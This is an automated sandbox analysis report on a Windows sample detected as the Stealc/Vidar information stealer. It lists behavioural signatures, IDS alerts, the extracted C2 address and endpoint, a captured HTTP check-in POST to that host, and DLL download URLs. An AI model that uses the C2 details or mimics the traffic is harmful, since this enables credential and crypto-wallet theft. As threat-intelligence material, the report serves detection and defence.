Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:	file.exe
Analysis ID:	1501501
MD5:	9ee7d1fb0f1e8a7a998da096b4da22a9
SHA1:	11cf686cb71ea7fbde2c0448ddd1f12ab44a393e
SHA256:	7394adbf1fe4a07aa08d1e7d25c10b28994eb7eb8671b8ef767c349b5b44c37d
Tags:	exe
Infos:

Detection

Stealc, Vidar

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Detected unpacking (changes PE section rights)

Found malware configuration

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected Powershell download and execute

Yara detected Stealc

Yara detected Vidar stealer

AI detected suspicious sample

C2 URLs / IPs found in malware configuration

Found evasive API chain (may stop execution after checking locale)

Found many strings related to Crypto-Wallets (likely being stolen)

Hides threads from debuggers

Machine Learning detection for sample

PE file contains section with special chars

Searches for specific processes (likely to inject)

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Tries to detect sandboxes and other dynamic analysis tools (window names)

Tries to detect virtualization through RDTSC time measurements

Tries to evade debugger and weak emulator (self modifying code)

Tries to harvest and steal Bitcoin Wallet information

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Crypto Currency Wallets

Tries to steal Mail credentials (via file / registry access)

Checks for debuggers (devices)

Checks if the current process is being debugged

Contains capabilities to detect virtual machines

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to create guard pages, often used to hinder reverse engineering and debugging

Contains functionality to dynamically determine API calls

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Detected potential crypto function

Downloads executable code via HTTP

Drops PE files

Drops PE files to the application program directory (C:\ProgramData)

Entry point lies outside standard sections

Extensive use of GetProcAddress (often used to hide API calls)

Found dropped PE file which has not been started or loaded

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

PE file contains an invalid checksum

PE file contains sections with non-standard names

Queries information about the installed CPU (vendor, model number etc)

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Classification

Process Tree

System is w10x64

file.exe (PID: 5320 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 9EE7D1FB0F1E8A7A998DA096B4DA22A9)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Stealc	Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.	No Attribution	https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://blog.sekoia.io/stealc-a-copycat-of-vidar-and-raccoon-infostealers-gaining-in-popularity-part-1/ https://blog.sekoia.io/stealc-a-copycat-of-vidar-and-raccoon-infostealers-gaining-in-popularity-part-2/ https://cocomelonc.github.io/book/2023/12/13/malwild-book.html https://g0njxa.medium.com/approaching-stealers-devs-a-brief-interview-with-stealc-cbe5c94b84af	https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

Name	Description	Attribution	Blogpost URLs	Link
Vidar	Vidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA Software and Tor Browser.	No Attribution	https://0x00-0x7f.github.io/A-Case-of-Vidar-Infostealer-Part-1-(-Unpacking-)/ https://0x00-0x7f.github.io/A-Case-of-Vidar-Infostealer-Part-2/ https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/vidar-stealer-h-and-m-campaign https://0xtoxin.github.io/malware%20analysis/Vidar-Stealer-Campaign/ https://asec.ahnlab.com/en/22932/	https://malpedia.caad.fkie.fraunhofer.de/details/win.vidar

Malware Configuration

Threatname: StealC

{"C2 url": "185.215.113.100/e2b1563c6670f193.php"}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
dump.pcap	JoeSecurity_Stealc_1	Yara detected Stealc	Joe Security

Memory Dumps

Source	Rule	Description	Author
00000000.00000002.2266753838.000000000138E000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
Process Memory Space: file.exe PID: 5320	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
Process Memory Space: file.exe PID: 5320	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
Process Memory Space: file.exe PID: 5320	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: file.exe PID: 5320	JoeSecurity_Stealc	Yara detected Stealc	Joe Security

Suricata Signatures

ET MALWARE Win32/Stealc Submitting System Information to C2 - Source IP: 192.168.2.5 - Destination IP: 185.215.113.100

Timestamp:	2024-08-30T00:48:01.527095+0200
SID:	2044248
Severity:	1
Source Port:	49704
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET MALWARE Win32/Stealc Active C2 Responding with browsers Config - Source IP: 185.215.113.100 - Destination IP: 192.168.2.5

Timestamp:	2024-08-30T00:48:00.047505+0200
SID:	2044245
Severity:	1
Source Port:	80
Destination Port:	49704
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE Common Downloader Header Pattern HCa - Source IP: 192.168.2.5 - Destination IP: 185.215.113.100

Timestamp:	2024-08-30T00:48:10.755871+0200
SID:	2803304
Severity:	3
Source Port:	49704
Destination Port:	80
Protocol:	TCP
Classtype:	Unknown Traffic

ET MALWARE Win32/Stealc Requesting plugins Config from C2 - Source IP: 192.168.2.5 - Destination IP: 185.215.113.100

Timestamp:	2024-08-30T00:48:00.291547+0200
SID:	2044246
Severity:	1
Source Port:	49704
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE Common Downloader Header Pattern HCa - Source IP: 192.168.2.5 - Destination IP: 185.215.113.100

Timestamp:	2024-08-30T00:48:02.061081+0200
SID:	2803304
Severity:	3
Source Port:	49704
Destination Port:	80
Protocol:	TCP
Classtype:	Unknown Traffic

ETPRO MALWARE Common Downloader Header Pattern HCa - Source IP: 192.168.2.5 - Destination IP: 185.215.113.100

Timestamp:	2024-08-30T00:48:12.452365+0200
SID:	2803304
Severity:	3
Source Port:	49704
Destination Port:	80
Protocol:	TCP
Classtype:	Unknown Traffic

ETPRO MALWARE Common Downloader Header Pattern HCa - Source IP: 192.168.2.5 - Destination IP: 185.215.113.100

Timestamp:	2024-08-30T00:48:08.158058+0200
SID:	2803304
Severity:	3
Source Port:	49704
Destination Port:	80
Protocol:	TCP
Classtype:	Unknown Traffic

ETPRO MALWARE Common Downloader Header Pattern HCa - Source IP: 192.168.2.5 - Destination IP: 185.215.113.100

Timestamp:	2024-08-30T00:48:10.036605+0200
SID:	2803304
Severity:	3
Source Port:	49704
Destination Port:	80
Protocol:	TCP
Classtype:	Unknown Traffic

ET MALWARE Win32/Stealc Requesting browsers Config from C2 - Source IP: 192.168.2.5 - Destination IP: 185.215.113.100

Timestamp:	2024-08-30T00:48:00.041454+0200
SID:	2044244
Severity:	1
Source Port:	49704
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE Common Downloader Header Pattern HCa - Source IP: 192.168.2.5 - Destination IP: 185.215.113.100

Timestamp:	2024-08-30T00:48:12.906494+0200
SID:	2803304
Severity:	3
Source Port:	49704
Destination Port:	80
Protocol:	TCP
Classtype:	Unknown Traffic

ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in - Source IP: 192.168.2.5 - Destination IP: 185.215.113.100

Timestamp:	2024-08-30T00:47:59.792672+0200
SID:	2044243
Severity:	1
Source Port:	49704
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config - Source IP: 185.215.113.100 - Destination IP: 192.168.2.5

Timestamp:	2024-08-30T00:48:00.298577+0200
SID:	2044247
Severity:	1
Source Port:	80
Destination Port:	49704
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE Common Downloader Header Pattern HCa - Source IP: 192.168.2.5 - Destination IP: 185.215.113.100

Timestamp:	2024-08-30T00:48:09.396625+0200
SID:	2803304
Severity:	3
Source Port:	49704
Destination Port:	80
Protocol:	TCP
Classtype:	Unknown Traffic

HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GHDHJEBFBFHJECAKFCAAHost: 185.215.113.100Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 47 48 44 48 4a 45 42 46 42 46 48 4a 45 43 41 4b 46 43 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 37 43 44 31 34 35 35 38 39 35 36 31 31 36 36 31 37 30 34 33 30 0d 0a 2d 2d 2d 2d 2d 2d 47 48 44 48 4a 45 42 46 42 46 48 4a 45 43 41 4b 46 43 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 6c 65 76 61 0d 0a 2d 2d 2d 2d 2d 2d 47 48 44 48 4a 45 42 46 42 46 48 4a 45 43 41 4b 46 43 41 41 2d 2d 0d 0a Data Ascii: ------GHDHJEBFBFHJECAKFCAAContent-Disposition: form-data; name="hwid"F7CD145589561166170430------GHDHJEBFBFHJECAKFCAAContent-Disposition: form-data; name="build"leva------GHDHJEBFBFHJECAKFCAA--

Source: file.exe, 00000000.00000002.2265894481.00000000001BC000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000002.2266753838.000000000138E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2265894481.000000000032D000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: http://185.215.113.100
Source: file.exe, 00000000.00000002.2266753838.00000000013E7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.100/
Source: file.exe, 00000000.00000002.2266753838.00000000013E7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.100/0d60be0de163924d/freebl3.dll
Source: file.exe, 00000000.00000002.2266753838.00000000013E7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.100/0d60be0de163924d/mozglue.dll
Source: file.exe, 00000000.00000002.2266753838.00000000013E7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.100/0d60be0de163924d/msvcp140.dll)
Source: file.exe, 00000000.00000002.2266753838.00000000013E7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.100/0d60be0de163924d/msvcp140.dllK
Source: file.exe, 00000000.00000002.2266753838.00000000013E7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.100/0d60be0de163924d/nss3.dll
Source: file.exe, 00000000.00000002.2266753838.00000000013E7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.100/0d60be0de163924d/nss3.dllc
Source: file.exe, 00000000.00000002.2266753838.00000000013E7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.100/0d60be0de163924d/softokn3.dll
Source: file.exe, 00000000.00000002.2266753838.00000000013E7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2265894481.00000000001EA000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: http://185.215.113.100/0d60be0de163924d/sqlite3.dll
Source: file.exe, 00000000.00000002.2266753838.00000000013E7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2284021788.0000000029A84000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.100/0d60be0de163924d/vcruntime140.dll
Source: file.exe, 00000000.00000002.2284021788.0000000029A84000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.100/0d60be0de163924d/vcruntime140.dllN
Source: file.exe, 00000000.00000002.2266753838.00000000013E7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.100/0d60be0de163924d/vcruntime140.dlll5
Source: file.exe, 00000000.00000002.2266753838.0000000001380000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2265894481.000000000032D000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: http://185.215.113.100/e2b1563c6670f193.php
Source: file.exe, 00000000.00000002.2266753838.0000000001401000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.100/e2b1563c6670f193.php$
Source: file.exe, 00000000.00000002.2266753838.0000000001401000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.100/e2b1563c6670f193.php(
Source: file.exe, 00000000.00000002.2266753838.0000000001401000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2266753838.0000000001380000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.100/e2b1563c6670f193.php0
Source: file.exe, 00000000.00000002.2266753838.0000000001380000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.100/e2b1563c6670f193.php3
Source: file.exe, 00000000.00000002.2266753838.0000000001380000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.100/e2b1563c6670f193.php:
Source: file.exe, 00000000.00000002.2266753838.0000000001380000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.100/e2b1563c6670f193.php=Iq
Source: file.exe, 00000000.00000002.2266753838.0000000001401000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.100/e2b1563c6670f193.phpBrowser
Source: file.exe, 00000000.00000002.2266753838.0000000001380000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.100/e2b1563c6670f193.phpH;
Source: file.exe, 00000000.00000002.2266753838.0000000001380000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.100/e2b1563c6670f193.phpLo
Source: file.exe, 00000000.00000002.2266753838.0000000001380000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.100/e2b1563c6670f193.phpf
Source: file.exe, 00000000.00000002.2266753838.0000000001401000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.100/e2b1563c6670f193.phph
Source: file.exe, 00000000.00000002.2265894481.000000000032D000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: http://185.215.113.100/e2b1563c6670f193.phpion:
Source: file.exe, 00000000.00000002.2266753838.000000000138E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.100/e2b1563c6670f193.phpm
Source: file.exe, 00000000.00000002.2266753838.0000000001380000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.100/e2b1563c6670f193.phpndI
Source: file.exe, 00000000.00000002.2266753838.0000000001401000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.100/e2b1563c6670f193.phpp
Source: file.exe, 00000000.00000002.2266753838.000000000138E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.100Z
Source: file.exe, 00000000.00000002.2265894481.000000000032D000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: http://185.215.113.100e2b1563c6670f193.phpion:
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl07
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0K
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://ocsp.digicert.com0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://ocsp.digicert.com0A
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://ocsp.digicert.com0C
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://ocsp.digicert.com0N
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://ocsp.digicert.com0X
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://www.digicert.com/CPS0
Source: file.exe, file.exe, 00000000.00000002.2294377143.000000006C6ED000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr	String found in binary or memory: http://www.mozilla.com/en-US/blocklist/
Source: file.exe, 00000000.00000002.2294260699.0000000061ED3000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2278875167.000000001D88A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.sqlite.org/copyright.html.
Source: AKFIDHDG.0.dr	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: file.exe, 00000000.00000002.2266753838.0000000001472000.00000004.00000020.00020000.00000000.sdmp, EGCFIDAFBFBAKFHJEGIJ.0.dr	String found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696425136400800000.2&ci=1696425136743.
Source: file.exe, 00000000.00000002.2266753838.0000000001472000.00000004.00000020.00020000.00000000.sdmp, EGCFIDAFBFBAKFHJEGIJ.0.dr	String found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696425136400800000.1&ci=1696425136743.12791&cta
Source: AKFIDHDG.0.dr	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: file.exe, 00000000.00000002.2266753838.0000000001401000.00000004.00000020.00020000.00000000.sdmp, AKFIDHDG.0.dr	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: file.exe, 00000000.00000002.2266753838.0000000001401000.00000004.00000020.00020000.00000000.sdmp, AKFIDHDG.0.dr	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: file.exe, 00000000.00000002.2266753838.0000000001472000.00000004.00000020.00020000.00000000.sdmp, EGCFIDAFBFBAKFHJEGIJ.0.dr	String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
Source: file.exe, 00000000.00000002.2266753838.0000000001472000.00000004.00000020.00020000.00000000.sdmp, EGCFIDAFBFBAKFHJEGIJ.0.dr	String found in binary or memory: https://contile-images.services.mozilla.com/u1AuJcj32cbVUf9NjMipLXEYwu2uFIt4lsj-ccwVqEs.36904.jpg
Source: file.exe, 00000000.00000002.2266753838.0000000001401000.00000004.00000020.00020000.00000000.sdmp, AKFIDHDG.0.dr	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: AKFIDHDG.0.dr	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: file.exe, 00000000.00000002.2266753838.0000000001401000.00000004.00000020.00020000.00000000.sdmp, AKFIDHDG.0.dr	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: EGCFIDAFBFBAKFHJEGIJ.0.dr	String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4p8dfCfm4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: https://mozilla.org0/
Source: AFBAFBKEGCFBGCBFIDAKEHDAFC.0.dr	String found in binary or memory: https://support.mozilla.org
Source: AFBAFBKEGCFBGCBFIDAKEHDAFC.0.dr	String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: AFBAFBKEGCFBGCBFIDAKEHDAFC.0.dr	String found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.GVegJq3nFfBL
Source: file.exe, 00000000.00000002.2266753838.0000000001472000.00000004.00000020.00020000.00000000.sdmp, EGCFIDAFBFBAKFHJEGIJ.0.dr	String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_35787f1071928bc3a1aef90b79c9bee9c64ba6683fde7477
Source: file.exe, 00000000.00000002.2266753838.0000000001472000.00000004.00000020.00020000.00000000.sdmp, EGCFIDAFBFBAKFHJEGIJ.0.dr	String found in binary or memory: https://www.bestbuy.com/site/electronics/top-deals/pcmcat1563299784494.c/?id=pcmcat1563299784494&ref
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: https://www.digicert.com/CPS0
Source: file.exe, 00000000.00000002.2266753838.0000000001401000.00000004.00000020.00020000.00000000.sdmp, AKFIDHDG.0.dr	String found in binary or memory: https://www.ecosia.org/newtab/
Source: AKFIDHDG.0.dr	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: AFBAFBKEGCFBGCBFIDAKEHDAFC.0.dr	String found in binary or memory: https://www.mozilla.org
Source: file.exe, 00000000.00000002.2265894481.00000000001BC000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.mozilla.org/about/
Source: AFBAFBKEGCFBGCBFIDAKEHDAFC.0.dr	String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.CDjelnmQJyZc
Source: file.exe, 00000000.00000002.2265894481.00000000001BC000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/
Source: AFBAFBKEGCFBGCBFIDAKEHDAFC.0.dr	String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.b3lOZaxJcpF6
Source: file.exe, 00000000.00000002.2265894481.00000000001BC000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/
Source: file.exe, 00000000.00000003.2213778910.000000002FC51000.00000004.00000020.00020000.00000000.sdmp, AFBAFBKEGCFBGCBFIDAKEHDAFC.0.dr	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: file.exe, 00000000.00000002.2265894481.00000000001BC000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/ZoZ2ZuaGJncGpkZW5qZ21kZ29laWFwcGFmbG58MXwwfDB8SmF4eCBM
Source: file.exe, 00000000.00000002.2265894481.00000000001BC000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/lvYnwxfDB8MHxMYXN0UGFzc3xoZG9raWVqbnBpbWFrZWRoYWpoZGxj
Source: AFBAFBKEGCFBGCBFIDAKEHDAFC.0.dr	String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: file.exe, 00000000.00000003.2213778910.000000002FC51000.00000004.00000020.00020000.00000000.sdmp, AFBAFBKEGCFBGCBFIDAKEHDAFC.0.dr	String found in binary or memory: https://www.mozilla.org/media/img/mozorg/mozilla-256.4720741d4108.jpg
Source: file.exe, 00000000.00000002.2265894481.00000000001BC000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/
